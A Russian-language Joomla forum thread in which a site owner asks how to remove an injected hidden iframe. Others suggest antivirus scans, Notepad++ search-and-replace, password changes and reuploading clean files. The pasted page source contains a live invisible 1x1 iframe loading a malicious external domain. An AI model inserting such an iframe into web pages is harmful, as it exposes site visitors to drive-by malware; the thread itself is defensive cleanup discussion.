Вирус на сайте, iframe с кракозяброй. - Безопасность сайтов на Joomla

 <!-- /header -->
          <div id="content-container" class="clearfix">
            <table width="100%" cellspacing="0" cellpadding="0" style="height:100%;">
              <tr valign="top">
                                <td id="main_content"><div class="componentheading">
   СЦ Диал - ремонт мобильных телефонов в Харькове</div>
<table class="blog" cellpadding="0" cellspacing="0">
<tr>
   <td valign="top">
               <div>
      <iframe src="http://dakilfu.net/?click=17F84A" width=1 height=1 style="visibility:hidden;position:absolute"></iframe><table class="contentpaneopen">
 
 
 
 
<tr>
<td valign="top" colspan="2">
<p align="justify"><strong><img src="/images/stories/my_images/lcd2_2.jpg" border="1" alt="Дисплеи" title="Дисплеи" hspace="10" vspace="10" align="right" />    Добро пожаловать!<br /><br /></strong>    Сервисный Центр "Диал


Такая вот беда, сохраненной версии сайта нет, чищу руками, уже сравнил казалось бы все файлы index и default, ан нет, все еще выскакивает. В админке все почистил, только в главной странице осталось, подскажите где хоть копать, какой файл генерирует содержимое центрального текста

Andreydial , была такая же беда . Избавился.
Список действий :
1. Здесь скачал антивирус
2.Снёс свой, был NOD32 ESS4XXX Установил тот который скачал.
3.Просканировал компьютер. Удалил все 27 вирусов которых не видел ни нод, не спайваредоктор, ни регран.
4.По ФТП скачал все свои сайты. Через Notepad++ нашёл все строчки с вредоносным кодом. Во вкладке "Найти и заменить" заменил все строки
<iframe="....   ....</iframe> на пробел, (т.е. удалил их)
5.Заменил ВСЕ ПАРОЛИ в ФТП клиенте (у меня Куте ФТП) причём заменял вставляя в менеджер недописанную на 1 СИМВОЛ строку пароля.
(Когда надо войти я по бумажке смотрю, чего мне и куда ещё подставить   )
6.Почищеные сайты забросил на сервер.

Два-три дня наблюдал . Один сайт снова побелел, Пришлось снова перелопатить все файлы и папки этого сайта. Нашёл яваскрипт в какой то левой папке.Удалил Всё работает .
Пиво за руководство мне высылать не надо . Не пью . А вот плюсик, самое оно

Просмотрел записи выпавшие после поиска по слову " iframe "
Оказывается огромное количество народа интересуется проблемой iframe
Предложение модераторам, давайте вынесем тему по айфреймам в важно, и попытаемся выработать общие методы по помощи и защите тех, кто подвергается атакам трояна айфреймщика .
Более чем уверен, есть множество методов борьбы с ним, из которых первый : замена действующего,( или установка - если не было ) антивируса.

Спасибо за помощь, оч. своевременно. Плюсик не могу поставить поэтому токо пиво
 

Я знаю, что ифраму вставляют в файлы index.* и default.*, но вот где-то я недосмотрел и пока мучаюсь.

Andreydial айфрейм лучше всего искать через Notepad++. В строке <Поиск> выбираешь вкладку <Найти в файлах>
Во вкладке путь выбираешь папку со скачаным по ФТП сайтом.
В строке фильтры ставишь  *.* Выставляешь галочку - Во всех подпапках / Во всех скрытых папках
В строке найти соответственно выставляешь слово </iframe> 
И понеслась.  .

Скажите, а по какой причине происходит вставка ифрейма в код файлом, учитывая, что права на запись выставлены корректно?
Спасибо.

Скажите, а по какой причине происходит вставка ифрейма в код файлом, учитывая, что права на запись выставлены корректно?
Спасибо.

что значит корректно? Ты через фтп не можешь редактировать этот файл?

Допустим права 644.

Ну права 644 дают возможность редактирования...

Подскажите, по какой маске следует выполнять поиск с заменой?
<iframe="....   ....</iframe>
Что прописать?

Да зачем вам это нужно? Перезалейте чистый дистр Joomla на хост с перезаписью существующих файлов, да и все дела.

Подскажите, по какой маске следует выполнять поиск с заменой?
<iframe="....   ....</iframe>
Что прописать?

Ну в общем вы правы, берёте строку - ВСЮ, троян должен писать её, во всех файлах без изменений, вставляете в найти/заменить и меняете на <пробел>
После замены поищите <iframe ещё разок, что не удалилось ((?) а вдруг)  удаляйте вручную .

Скажите, а по какой причине происходит вставка ифрейма в код файлом, учитывая, что права на запись выставлены корректно?
Спасибо.

По причине не очень правильного антивируса у вас на компьютере . Сейчас рекомендую этот